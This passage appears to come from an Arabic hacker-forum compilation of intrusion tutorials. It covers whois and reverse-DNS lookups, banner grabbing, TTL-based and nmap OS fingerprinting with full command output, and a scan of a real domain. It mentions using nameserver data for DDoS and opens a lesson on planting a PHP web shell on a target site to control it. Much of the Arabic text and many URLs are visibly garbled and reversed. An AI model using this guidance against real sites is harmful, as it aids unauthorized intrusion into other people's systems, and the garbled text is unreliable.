:م مثل ھذه الخدمة وأقواھا على اإلطالق وھناك أيضا مواقع تقد

com.netcraft.www://http/

:وھناك أيضا موقع com.411dns.www://http/

سال ايمیل إلى عنوان غیر وھناك طريقة قديمة معروفة لدى الكثیرين وھي إرموجود في الموقع لیأتیك الرد على ايمیلك بأن العنوان الذي قصدته غیر مطلوب

....وتحتوي الرسالة على معلومات عن نظام التشغیل ...ولكن ھذه الثغرة أصبحت قديمة وال تعمل إال مع مواقع قديمة جدا

مثل Telnetستخدام ال والطريقة المضلة ھي عن طريق التشبیك مع الموقع با

: telnet com.xxxx.www://http/

ويتم الدخول ھنا باستخدام أحد , الموقع بدال عن اسمه IPأو باستخدام :المنافذ المفتوحة في الموقع ومنا على سبیل المثال

...FTP ويستخدم لبروتوكول ال 21

463

.... في الموقع Telnetدم لخدمة ال ويستخ23 .........POP اليمیل من نوع Stmp خدمة برتوكول اإلرسال 25

..........POP خدمة بروتوكول االستقبال وھو 110وعن طريق ھذين األخیرين يتم تدمیر خدمة البريد في الموقع ولھذا حديث آخر

........ مثل ك ھنا Telnetويمكنك استخدام بعض أوامر ال

( ويستخدم لعرض محتويات السیر فر وما يحويه من برامج وملفات Listأمر تحتاج الى بعض الخبرة ھنا ) يمكنك من خاللھا مثال معرفة نظام التشغیل

....... ورقم .... وذلك إلخفاء ھويتك Anonymousطبعا ھنا يجب أن تستخدم خاصیة

........IPال

:ئج التالیة لنفترض أنك حصلت على النتا 4Linuxنظام التشغیل ھو

31Apache,والملقم ھو ........PHP أو CGIوالبنیة البرمجیة المستخدمة في بناء الموقع ھي مثال

نحفظ ھذه النتائج في ورقة عمل خاصة لننتقل إلى الخطوة التالیة األھم وھي

في البنیة الكشف عن الثغرات الموجودة في نظام التشغیل أو الملقم أو: .......البرمجیة

......ولھذا درس أخر أقوم حالیا بتحضیره وسأضعه قريبا

المھم أن ھذه النتائج التي حصلنا علیھا تحتاج إلى جلسة عمل كاملة تختلف

ولكن البد أن , مدتھا باختالف مدى خبرة المخترق ومدى معرفته بھذه األدوات ة متناھیة ومن خالل تجريب أكثر من أداة تتم جمع ھذه المعلومات كما قلت بدق

وأكثر من محاولة واحدة وذلك للتأكد من دقة المعلومات واالنتقال إلى المرحلة ....التالیة بأمان

:ملحقات البحث :المواقع التي تقدم خدمة التصفح الخفي منھا : أوال com.anonymizer.www//:http/ jsp.home/ZLPlus/ps/com.ziplip.www://https

464

:مواقع تحوي االدوات التي ذكرتھا وھي مواقع رائعة جدا : ثانیا shtml.indexsize/scanner-wingate/org.packetstormsecurity://http

htm.newbie/txt/ar.org.textolandia.www://http

قلما تجد مثل ھذا الوضوح وختاما أعتقد أنني قدمت معلومات سھلة ومبسطة وال تحتاج األمر منك إال إلى التجربة والمحاولة , في كثیر من مواقع الھكر

........الكتساب الخبرة

465

اتخالص اكبر قدر ممكن من المعلومات عن الموقع من خالل الدومین

befcake :للكاتب

للدومین whois طبعا انا بحاول اشرح بصوره مبسطه كیفیه عمل

لكن فعاله في معرفه شركه االستضافه او صاحب الدومین وعده طرق خفیفه DOMAIN WHOIS اول شي نبدأ فیه ال

ان لكل دومین صاحب و معلومات طبعا كلنا نعرف وصالت و تحمیل ف باخذ موقع يوفر ھالخدمه اونالين طبعا انا ما ابي احط لك

php.whois/com.geektools.www://http ھذا اجراء علشان يمنع "الي راح يظھر بالصوره طبعا بتحط الموقع و الرقم

WHOIS "الموقع مال ال البحث االوتماتیكي حمايه لترافیك وفي موقع ثاني اال و ھو

/whois/com.grs-verisign.registrar://http ناحیه النتائج افضل و ادق من

التالي راح يطلع لناcc .a4 sعلى العموم نكمل و نحط الدومین مثال :كود

Whois Server Version 1.0 Domain names can now be registered with many different competing registrars. Go to http://registrar.verisign-grs.com/whois/ for detailed information. Domain Name: S4A.CC Registrar: ENOM, INC. Whois Server: whois.enom.com Referral URL: http://www.enom.com Name Server: NS5.ARASERV.COM Name Server: NS11.ARASERV.COM Name Server: NS6.ARASERV.COM Name Server: NS10.ARASERV.COM Status: CLIENT-XFER-PROHIBITED Status: CLIENT-DELETE-PROHIBITED Updated Date: 16-dec-2004 Creation Date: 07-nov-2004 Expiration Date: 07-nov-2005

466

ف شغالت مھمه اال و ھيقدرنا نعر طبعا من الكالم الي سبق com.araserv.www://http/ شركه االستضافه و ھي

ممكن ھالمعلومه DDOS في حاله لو كنت ناوي تسوي name servers "و ال "تفیدك .انتھاء الدومین لو كنت ناوي تاخذ الدومین بعد ما ينتھي وتاريخ

وفعاله في نفس الوقت لمعرفه شركه طريقه اخرى بسیطهكما في االستضافه reverse dns و ھي ال

بسیط بوريكم مثال :كود

* Dns resolving kawaser.net - * Dns resolved kawaser.net to 207.44.172.50 - * Dns resolving 207.44.172.50 - * Dns resolved 207.44.172.50 to ev1s-207-44-172-50.ev1servers.net

net .servers1 evمثل ما انتوا شايفین شركه االستضافه راح تكون طبعا

حلوه و سريعه وفیه طريقه بعد 143اال و ھي االتصال على بورت

cc.a4 sخلونا نجرب على موقعنا :كود

* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=LOGIN] ara2.araserv.com IMAP4rev1 2003.339-cpanel at Sun, 13 Mar 2005 15:02:11 +0300 (AST)

com.araserv.2 araباين واضح انه سرفر الموقع طبعا

com. araservوشركه االستضافه اتمنى اني اكون افدتكم بالمعلومات الخفیفه ھذي

467

Remote OS Detection

Arrow Broken:للكاتب

ألن المخترق غالبا ما . یع في عالم األختراقھذا الموضوع من أھم المواضسواء كان يستھدف . يبدأ في البحث عن أكبر كمیة من المعلومات عن ھدفه

و أول ما يبدأ المخترق في . أو حتى شبكة كاملة, أحد المواقع أو المزوداتھذا المقال ھو عباره عن مجموعة من .البحث عنه ھو نظام التشغیل للھدف

و يعتمد على الكثیر . ألنه موضوع شديد التشعب. ألقالم ال أكثرالنقاط و رؤوس ا :).على األقل بالنسبة لي , من التقنیات المعقدة

من المفترض ان . لكي نتمكن من األستمرار معا حتى نھايه ھذا المقال سوف shell accountال أعلم أن كانت الـ. Unix أو Linuxتملك نظام تشغیل كما ينبغي ان . ض األوامر التي سوف ننفذھا خالل الموضوعتكون مناسبة لبع . IP/TCPو لو بسیطة ببروتوكول , تكون لديك معرفه

أولى ھذه . سوف أبدأ بمناقشة بعض الطرق التقلیدية و القديمه نوعا ماالذي سوف , بأسم مغلوط إلى النظام المستقبلmail-Eھي أرسال , الطرق

به بالرد برسالة تفید بأن من أرسلت له رسالتك غیر يقوم ملقم البريد الخاص الخاصه بالرسالة سوف تجد معلومات خاصه Headersعند عرض الـ. موجودانا لم أجرب ھذه الطريقة من , في الحقیقة. و نظام التشغیل الخاص به, بالھدف

المھم انھا من أقدم و:). ربما ألنني قرأت عنھا في ملفات تفوقوني عمرا . قبل .أشھر الطرق في ھذا المجال

Banner Grabbing

و ھذه تعتبر عیبا قاتال في الكثیر من . Bannersالطريقة األخرى ھي الـتستطیع , حیث أنك تستطیع بمجرد األتصال بالخدمة. األنظمة و التطبیقات

حیث . و ربما أكثر من ذلك, الحصول على أسم البرنامج العامل على المنفذ

468

و المشكلة أن الكثیر من . حصول على نوع و أصدار نظام التشغیليمكنك الو سوف . أو على األقل تزيیف ھذه البانارات, مدراء األنظمة ال يھتمون بأغالق

....نناقش األن بعض الوسائل الخاصه بالحصول على مثل ھذه المعلومات

ام به ھو كل ما علینا القی. لتحديد الخدمة العاملة على أي منفذ, مبدئیاوغالبا ما نجد الكثیر من . عاديTelnet clientاألتصال بھذا المنفذ عن طريق أي

...سوف نقوم ببعض التجارب و نرى نتائجھا. المعلومات القیمة بھذه الطريقة

[root@localhost root]# telnet 127.0.0.1 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. Red Hat Linux release 7.2 (Enigma) Kernel 2.4.5 on an i686 login:

و . Telnet الذي يخدم الـ23نالحظ ھنا أننا قمنا باألتصال بالمنفذ رقم الخدمة عرضت نظام التشغیل و أصداره و و " :). أتفضحت"نالحظ أيضا أنني

أنني أعلنت كل المعلومات أي. Architecture و الـKernelنوعه و أصدار الـ .الدقیقة التي يحتاجھا من يخطط ألختراق جھازي

حیث تقوم الخدمة , FTPمنفذ الـ, من المنافذ التي يمكن األتصال بھا أيضا

...بتقديم بعض المعلومات عند األتصال بھذا المنفذ

[root@localhost root]# telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. 220 localhost.localdomain FTP server (Version wu-2.6.1-18) ready. user broken 331 Password required for broken. pass ************* 230 User broken logged in. syst 215 UNIX Type: L8 quit 221-You have transferred 0 bytes in 0 files. 221-Total traffic for this session was 421 bytes in 0 transfers. 221 Thank you for using the FTP service on localhost.localdomain. Connection closed by foreign host. [root@localhost root]#

469

, بمجرد أتمام األتصال . FTPنالحظ ھنا أنني قمت باألتصال بمنفذ خدمة الـ

و عند تسجیل . قام الخادم بإخباري عن نوع برنامج الخادم و أصداره بالتفصیل الذي يمنحني المزيد من المعلومات عن نظام SYSTقمت بتنفیذ األمر , الدخول

. أن ھذا األمر يعتمد على الخادم و أعداداته, ينبغي أن نقول. التشغیل و الخادمو . Loginن في بعض الحاالت تنفیذ ھذا األمر قبل عملیة الـحیث أنه من الممك

من الممكن أيضا عند . في أحیان أخرى يتم أيقاف ھذا األمر تماما عن العمل , anonymousحتى و لو كان ذلك بحساب الـ, تسجیل الدخول إلى الخادم

ج و أستخرا/ls/binمثل , التنفیذية Binary الحصول على أحدى ملفات الـ .المزيد من المعلومات عن نظام التشغیل و بنیته

أو 80 على المنفذ HTTPالخدمة التالیة التي سوف نقوم بدراستھا ھي

Webأذا كان الھدف من عملیة تحديد نظام التشغیل ھو عبارة عن . 8080Serverتكمن اھمیة ھذه الخدمة. فإنك بالتأكید سوف تجد ھذه الخدمة مفعلة ,

سوف . كننا من الحصول على كمیة أكبر من المعلومات عن ھدفنافي انھا تم ...نجرب الحصول على المعلومات من ھذه الخدمة

.... و لنر ما سیحدثTelnetسوف نقوم بألتصال بھذا المنفذ بواسطة الـ

[root@localhost root]# telnet 127.0.0.1 80 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. GET /qwe HTTP/1.1 HTTP/1.1 400 Bad Request Date: Sat, 05 Oct 2002 18:06:38 GMT Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b DAV/1.0.2 PHP/4.0.6 mod_perl/1.24_01 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Connection closed by foreign host.

لقد قمنا ھنا . ال اكثر, الناتج لتقلیل الحجمHTML codeلقد قمت بحذف الـفكانت المخرجات , لح غیر صاGETو قمنا بتنفیذ طلب , 80باألتصال بالمنفذ رقم

و . الدالة على عدم العثور على الصفحة المطلوبة400ھي صفحة الخطأ رقم

470

و , مثل نوع الخادم و أصداره. بعدھا يعطینا الخادم الكثیر من المعلومات عنه .نظام التشغیل و المزيد من المعلومات األخرى

[root@localhost root]# telnet 127.0.0.1 80 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. HEAD 127.0.0.1 HTTP/1.1 HTTP/1.1 400 Bad Request Date: Sat, 05 Oct 2002 18:01:20 GMT Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b DAV/1.0.2 PHP/4.0.6 mod_perl/1.24_01 Connection: close Content-Type: text/html; charset=iso-8859-1 Connection closed by foreign host.

و بالتالي , الذي يعطینا رأس الصفحة فقط ,HEADھنا قمنا بتفیذ الطلب

.نحدد مجال المعلومات التي نحتاجھا

برامج تحديد و Scan من برامج الـ الغالبیة العظمىينبغي ان نذكر ان موقع الـ, و سھولة, و الوسیلة األكثر شھرة, أنظمة التشغیل المختلفة

com.netcraft.wwwتقوم بتحديد نظام التشغیل بھذه الطريقة .

المشھورة في ھذا , أو باألصح, أعتقد اننا ذكرنا معظم التقنیات المعروفةو لكن بشكل . داالمجال سوف ننتقل إلى بعض التقنیات األكثر تخصصا و تعقی

و في حالة الرغبة في الدراسة و . نظرا لتشعبھا و تقدمھا. مبسط و سطحيمن الممكن البحث عن ھذا الموضوع , في ھذا الموضوع, التعمق بشكل أكبر

.في األنترنت

~~~~~~~~~~~~~~~~~~~~~~~~

471

Remote OS Detection Using Ping & TTL

و . في تحديد نظام التشغیل المستھدفngPiسوف نستعمل أداة الـ , نعمتستخدم . علینا أن نتحدث قلیال عن ھذه األداه, لكي نتمكن من المتابعة

تعتمد على . في عملیات أكتشاف و تحديد األخطاء في أنظمة الشبكاتPingالـ ICMP Typeحیث يتلخص عملھا ببساطة في أرسال الطلب . ICMPبرتوكول الـ

)ECHO REQUEST(8 و يقوم الجھاز المستھدف بأستقبال ھذا الطلب و الرد ھي عبارة Time To Live(TTL(الـ . 0 ICMP Type)ECHO REPLAY(علیه بـ

و لكل نظام . Data Packetعن قیمة توضع في أحدى خانات حزمة البیانات يمكن تحديد نظام , و عن طريق جدول معین. TTLتشغیل قیمة معینة للـ

....التشغیل

C:\>ping 127.0.0.1 Pinging 127.0.0.1 with 32 bytes of data: Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds:

ms0= Average , ms0= Maximum , ms0= Minimum

الـ نجد أن قیمة , و عند النظر إلى النتائج, قمت بتنفیذ األمر على جھازي128= TTLو ھي القیمة المرتبطة بأنظمة الـ Windowsو في ما . بشكل عام -: المرتبطة بھا TTLو قیم الـ, الجدول الخاص بأنظمة التشغیل, يلي

OS VERSION PLATFORM TTL Windows 9x/NT Intel 32 Windows 9x/NT Intel 128

472

Windows 2000 Intel 128 DigitalUnix 4.0 Alpha 60 Unisys x Mainframe 64 Linux 2.2.x Intel 64 FTX(UNIX) 3.3 STRATUS 64 SCO R5 Compaq 64 Netware 4.11 Intel 128 AIX 4.3.x IBM/RS6000 60 AIX 4.2.x IBM/RS6000 60 Cisco 11.2 7507 60 Cisco 12.0 2514 255 IRIX 6.x SGI 60 FreeBSD 3.x Intel 64 OpenBSD 2.x Intel 64 Solaris 8 Intel/Spar 64 Solaris 2.x Intel/Sparc 255

473

عند التطبیق في الحیاة . ھذه ھي بعض األنظمة و القیم المرتبطة بھا عند . سوف نالحظ أن القیم الناتجة ال تساوي القیم السابقة أطالقا, العملیة

لذا . 1 تنقص بمقدار TTL فإن قیمة الـNode أو Routerبأي , ور حزم البیاناتمر أو Windows على الـexe.Tracertينبغي علینا أن تقوم بأستعمال األداة

tracerouteعلى الـ linux .حیث نقوم بإضافة عدد الـNodes بیننا و بین النظام و , ى القیمة الصحیحةللحصول عل, الناتجةTTLإلى قیمة الـ, المستھدف

.بالتالي تحديد نظام التشغیل

, ينبغي أن نذكر ھنا أن ھذه الطريقة لم تعد مجدية في الكثیر من األحیانبوساطة . نظرا ألن معظم األنظمة حالیا تقوم بتغییر ھذه القیم أو منعھا تماما

ات الداخلة و التي تقوم بفلترة و مراقبة البیانIDSالجدران النارية أو أنظمة الـ .الخارجة من الشبكة

````````````````````````````````````

OS Fingerprinting

تعتمد ھذة . أحدث الطرق و أكثرھا تقدما و تعقیدا, تعد ھذه الطريقة

الطريقه على وجود العديد من األختالفات بین أنظمه التشغیل المختلفة و حیث . )IP/TCP ),791793RFCوتوكول الـفي التعامل مع مواصفات بر, أصداراتھاكما . التي قد يقبلھا أو يعطلھا نظام التشغیلRequests و الـOptionsتختلف الـ

و من . تعتمد على األختالف في رسائل الخطأ و صورھا التي يرسلھا النظامو عن كريق أجراء عده تجارب مختلفة على العديد من أنظمة التشغیل و , ھنا

و يسھل علینا بعد ذلك . مكن أن نحدد ھذه األختالفات بین األنظمةي, أصداراتھا .نظام التشغیل و اصداره, أن نحدد بدقة معقولة نسبیا

حیث ان , و التي تعتبر توضیحیة فقط, فیما يلي بعض األمثلة المبسطة

سوف نستعمل في األختبارات التالیة األداتین . األمر أكثر تعقیدا و صعوبة TCP تستعمل لألرسال حزم hping, األداة األولى . hping , icmpush: التالیتین

و في نفس الوقت تقوم بأنتظار , مختلفة لھاflagsو أمكانیة تحديد خیارات و و أستقبال , ICMP تستعمل في أرسال حزم الـicmpush, األداة الثانیة. الرد

.الرد علیھا

474

ألنني أردت أن أكون , االتلقد قمت بأقتباس ھذا المثال من أحدى المقلذا ففي الغالب لن يكون للعنوان الذي نجري , و صیغ األوامر, واثقا من النتائج

OSنريد القیام بعملیة الـ , لنفترض أن لدينا نظاما. علیه األختبار أي معنىfingerorintingسوف يكون العمل كالتالي. لھذا النظام...

و يقوم ھذا , للھدف Request17 type ICMPبداية سوف نقوم بأرسال المستخدم على شبكه النظام subnet maskالطلب بالحصول على الـ

Address Mask (Replay 19 ICMP typeو يكون رد النظام ھو , المستھدف)Replay .تعد ھذه ھي احدى نقاط األختالف بین أنظمة التشغیل المختلفة .

وال ترسل ردا على , جیب لھذا الطلب ال تست*nixحیث أن معظم أنظمة الـ ... بالرد بشكل طبیعيwindowsفي حین تقوم أنظمة الـ , األطالق

[root@localhost]#icmpush -vv -mask 10.10.1.17 -> Outgoing interface = 10.10.1.1 -> ICMP total size = 12 bytes -> Outgoing interface = 10.10.1.1 -> MTU = 1500 bytes -> Total packet size (ICMP + IP) = 32 bytes ICMP Address Mask Request packet sent to 10.10.1.17 (10.10.1.17) Recieving ICMP Replies... icmpush: program finished OK

و قام البرناج -mask ألرسال طلب الـicmpushقمنا بأستعمال أداة الـ و عندما لم يستقبل ردا قام بطبع رسالة تفید , و أنتظار الرد, لببأرسال الط

.بأنتھاء العملیة

نالحظ ان النظام السابق لیس أحد أنظمة الـ , كما سبق و أن ذكرناwindowsنستنتج من ذلك أن النظام . حیث أننا لم نستقبل ردا على األطالق

.*nixربما يكون أحد أفراد عائلة الـ

475

علیھا , TCPعند أرسال أي حزمة . نقوم باألختبار التالي, النظام أكثرلنحددACK flags/SYN إلى أي نظام nix* , أو حتىwindows فإن النظام يستجیب

األنظمه الوحیدة التي تشذ عن ھذه . RST flag تحمل الـTCPبأرسال حزمة ھنا يمكننا و من . حیث ال تستجیب أطالقا , *BSDھي انظمة الـ , القاعدة

. أم ال* BSDتحديد ما إذا كان النظام المستھدف يعمل على

[root@localhost]#hping 10.10.1.17 -c1 -p 23 -S -A hping 10.10.1.17 (eth0 10.10.1.17) : SA set, 40 data bytes

و لم نستقبل أي , ألرسال الحزمة المطلوبةhpingقمنا بأستخدام األداة

, و بأجراء المزيد من األختبارات. *BSDمما يعني أن النظام ھو , القرد على األطما سبق ھو مثال .و رقم األصدار أيضا, من الممكن تحديد توزيعة نظام التشغیل

و ھو للمساعدة على فھم . حول ھذا الموضوع, بسیط و سطحي للغاية .الموضوع ال أكثر

`````````````````````````````````````

S fingerprintingO

-: إلى القسمین التالیین OS fingerprinting يتم تصنیف الـ

+Active OS Fingerprinting

و تحلیلھا , و أستقبال الردود , و يعتمد على أرسال حزم من الیبانات -:و ينقسم ھذا الجزء بدوره إلى قسمین. للحصول على النتائج

-IP Fingerprinting /TCP

476

-MP Fingerprinting IC + Passive OS Fingerprinting

و لن أقوم بمناقشته في ھذا . Sniffingو يعتمد بشكل أساسي على الـ ;(...ربما في الحلقات القادمة. الملف

````````````````````````````````````

IP Fingerprinting/TCP

على أختالف ngerprintingIP Fi/ TCPتعتمد فكرة الـ, كما ذكرنا سابقاتختلف , بمعنى أخر. على مختلف أنظمة التشغیلIP/TCPمواصفات بروتوكول الـ

. معینTCPبالنسبة لنفس طلب أو أتصال , أستجابة كل نظام تشغیل عن األخربحیث يمكن تحديد نظام التشغیل بمجرد المقارنة بأستجابة نظام التشغیل

.المعلومة مسبقا

, من األدوات التي تمكننا من القیام بھذا النوع من الفحصتوجد العديد . *nixو التي تعمل كلھا تقريبا على أنظمة الـ, والمتوفرة على شبكة األنترنت

nmapنظرا ألن . nmap, queso, d1SS by Su, checkos:من أھم ھذه األدوات يقتصر حديثنا علیه فسوف , و األكثر أنتشارا و أستعماال, ھو األقوى و أألفضل .في الوقت الحالي

ھو عبارة عن أداة ألستكشاف )nmap )erMAPetwork N, مبدئیاالوظائف . كما يمكن بالطبع أستخدامه بالنسبة لألجھزة المنفردة. الشبكات

-: ھي كالتاليnmap األساسیة للـ

.التأكد من وجود األجھزه على الشبكة+ ).ما ھي الخدمات العاملة علیھا(علیھا ماھي المنافذ المفتوحة + ).بدقه مناسبة( ماھو نوع نظام التشغیل و ما أصداره + . الموجود على ھذه الشبكة Filteringتحديد نوع الـ+

477

بالعديد من nmapيتمیز . باألضافة إلى الكثیر من المعلومات األخرى

يستعمل حزم , ningport scanحیث يقوم بدعم العديد من تقنیات الـ. الممیزاتيتمیز بالقوة و . يقوم بتمییز عدد كبیر من أنظمة التشغیل . UDP و الـ TCPالـ

و المیزة األساسیة في . حیث يمكن أستخدامه لفحص شبكات كاملة, السرعةحیث ان ملف المساعدةالخاص به , الجیدDocumentationھي التوثیق , رأيي

بغض النظر عن العديد من الوثائق , ةيحمل الكثیر من المعلومات و األمثل .الموجوده على األنترنت حول استعماله

البسیطة مع بعض Parametersسوف نقوم بمناقشه بعض الخیارات و ...األمثلة

... بدون أي خیاراتnmapعند تشغیل الـ

[root@localhost root]# nmap Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options] <host or net list> Some Common Scan Types ('*' options require root privileges) * -sS TCP SYN stealth port scan (default if privileged (root)) -sT TCP connect() port scan (default for unprivileged users) * -sU UDP port scan -sP ping scan (Find any reachable machines) * -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only) -sR/-I RPC/Identd scan (use with other scan types) Some Common Options (none are required, most can be combined): * -O Use TCP/IP fingerprinting to guess remote operating system -p <range> ports to scan. Example range: '1-1024,1080,6666,31337' -F Only scans ports listed in nmap-services -v Verbose. Its use is recommended. Use twice for greater effect. -P0 Don't ping hosts (needed to scan www.microsoft.com and others) * -Ddecoy_host1,decoy2[,...] Hide scan using many decoys -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve] -oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile> -iL <inputfile> Get targets from file; Use '-' for stdin * -S <your_IP>/-e <devicename> Specify source address or network interface --interactive Go into interactive mode (then press h for help) Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*' SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

478

سوف نقوم , المھم:) . و ما خفي كان أعظم , ھذا ملف األستعمال فقطو من الممكن للراغب في األستزادة , بمناقشة بعض الخیارات األكثر أستعماال

. الخاصه بالبرنامجpageman الرجوع إلى الـ

-:مثال++ [root@localhost root]# nmap -sT -O -vv 127.0.0.1 Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Host localhost.localdomain (127.0.0.1) appears to be up ... good. Initiating Connect() Scan against localhost.localdomain (127.0.0.1) Adding open port 23/tcp Adding open port 6000/tcp Adding open port 22/tcp Adding open port 1027/tcp Adding open port 111/tcp The Connect() Scan took 1 second to scan 1601 ports. For OSScan assuming that port 22 is open and port 1 is closed and neither are firewalled Interesting ports on localhost.localdomain (127.0.0.1): (The 1596 ports scanned but not shown below are in state: closed) Port State Service 22/tcp open ssh 23/tcp open telnet 111/tcp open sunrpc 1027/tcp open IIS 6000/tcp open X11 Remote operating system guess: Linux Kernel 2.4.0 - 2.5.20 OS Fingerprint: TSeq(Class=RI%gcd=1%SI=26D8DB%IPID=Z%TS=100HZ) T1(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW) T2(Resp=N) T3(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW) T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E) Uptime 0.007 days (since Sat Oct 5 01:12:31 2002) TCP Sequence Prediction: Class=random positive increments Difficulty=2545883 (Good luck!) TCP ISN Seq. Numbers: CF9FF245 CF78E942 CFD91AAE D0406C91 D0535F65 D05E00C1 IPID Sequence Generation: All zeros

479

Nmap run completed -- 1 IP address (1 host up) scanned in 5 seconds

في المثال السابق قمت بأجراء فحص على جھازي الخاص بأستخدام -:الخیارات التالیة

+port scan() sT TCP connect

و ھي تعد . كوسیلة للفحصTCPل و يقوم ھذا الخیار بتحديد حزم اكما أنھا األسھل , الطريقة األكثر إنتشارا و أستعماال بین برامج الفحص المختلفة

ھي انھا ال تحتاج إلى أي صالحیات من , المیزة الوحیدة لھذه الطريقة. أكتشافا .كبقیة الطرق األخرى, المستخدم

+e operating systemIP fingerprinting to guess remot/O Use TCP-

IP / TCPأستعمال الـ. ھذه ھي النقطة األساسیة في الموضوعfingerprintingلتحديد نظام التشغیل.

+v Verbose-

ھذا الخیار يقوم بجعل البرنامج بعرض معلومات عن العملیات التي يقوم .و يستخدم مرتین لزيادة تأثیره و زيادة المعلومات المخرجة. بھا

``````````````````````````````

-:مثال آخر++

[root@localhost root]# nmap -sS -O -vv brokenarrow.org Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Host ns.tibp.com (65.38.3.34) appears to be up ... good. Initiating SYN Stealth Scan against ns.tibp.com (65.38.3.34) Adding open port 3372/tcp Adding open port 1025/tcp Adding open port 80/tcp

480

Adding open port 443/tcp Adding open port 3389/tcp Adding open port 1026/tcp Adding open port 465/tcp Adding open port 6103/tcp Adding open port 1027/tcp Adding open port 21/tcp Adding open port 53/tcp Adding open port 26/tcp Adding open port 10000/tcp The SYN Stealth Scan took 67 seconds to scan 1601 ports. For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled Interesting ports on ns.tibp.com (65.38.3.34): (The 1583 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 26/tcp open unknown 53/tcp open domain 80/tcp open http 135/tcp filtered loc-srv 137/tcp filtered netbios-ns 139/tcp filtered netbios-ssn 443/tcp open https 445/tcp filtered microsoft-ds 465/tcp open smtps 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1027/tcp open IIS 1080/tcp filtered socks 3372/tcp open msdtc 3389/tcp open ms-term-serv 6103/tcp open RETS-or-BackupExec 10000/tcp open snet-sensor-mgmt Remote operating system guess: Windows 2000/XP/ME OS Fingerprint: TSeq(Class=RI%gcd=2%SI=DC67%TS=0) T1(Resp=Y%DF=Y%W=FAF0%ACK=S++%Flags=AS%Ops=MNWNNT) T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) T3(Resp=Y%DF=Y%W=FAF0%ACK=S++%Flags=AS%Ops=MNWNNT) T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=) T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=) T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=) PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

481

TCP Sequence Prediction: Class=random positive increments Difficulty=56423 (Worthy challenge) TCP ISN Seq. Numbers: 8795E81D 87989E7F 879AB8A3 879EA68B 87A12C7D 87A804B9 IPID Sequence Generation: Busy server or unknown class Nmap run completed -- 1 IP address (1 host up) scanned in 86 seconds [root@localhost root]#

وھو يستخدم ما -sS TCP SYN stealth port scanا األختیار ھنا أستعملن

. وقلة المواقع التي تقوم برصده, يتمیز بالسرعة. يسمى باألتصال نصف المفتوح .rootانھا تستلزم صالحیات الـ , و لكن يعیب ھذه الطريقة

و , نالحظ في ھذا المثال ان البرنامج قد وضح لنا المنافذ المفتوحة

.أم ال, و أذا ماكانت مفلترة باحدى وسائل الحماية, املة علیھاالخدمات الع

482

PHPأداة

narEy- aL:للكاتب

نقاط الدرس phpshell ما ھي أداة ال -1 phpshell كیف تعمل ال -2 phpshell بعص أوامر ال -3 مواقع منوعة أنصح بھا-4

:أوال ؟phpshellما ھي أداة

ھي أداة تستطیع من خاللھا تنفیذ أوامـر لیـنكس أو shellphpاذا صح التعبیر ال

يونكس ال أذكـر واحـد مـن التنــین لتـستطیع ان تـتحكم بـالموقع مــن انـشاء الغـاء اعــادة

...تسمیة و غیرھا

:ثانیا ؟phpshellكیف يمكن االستفادة من

و العنصر الرئیسي فیھا php ھي عبارة عن عدة ملفات بصیغة phpshellأوال ال حیث تستطیع أن تعدله shellو ھوة

يعني ما حدا يستخدمه غیرك password& user nameمن النوتباد لتجعل له الىن فالنفرض عدلنا الشیل و حطینا فیه الیوزر اللي بدنا ايـاه و الباسـورد اللـي

اخترناه نروح نحط الشي بـالموقع المـراد اختراقـه يعنـي الزم تجـد طريقـة لمنـك تحمـل

ل على الموقع المراد اختراقه و الطريقة تعود لذكائك أو تحمـل الـشیل عـن الشی طريق ارفاق ملف في منتدى يعني اللي يعجبك

على الموقع الي بـدنا نخترقـه طیـب و بعـدين ھـال php.shellالى ان حملنا ال php.shell كیف رح نتحكم فیه ھل فیه برنامج لذلك

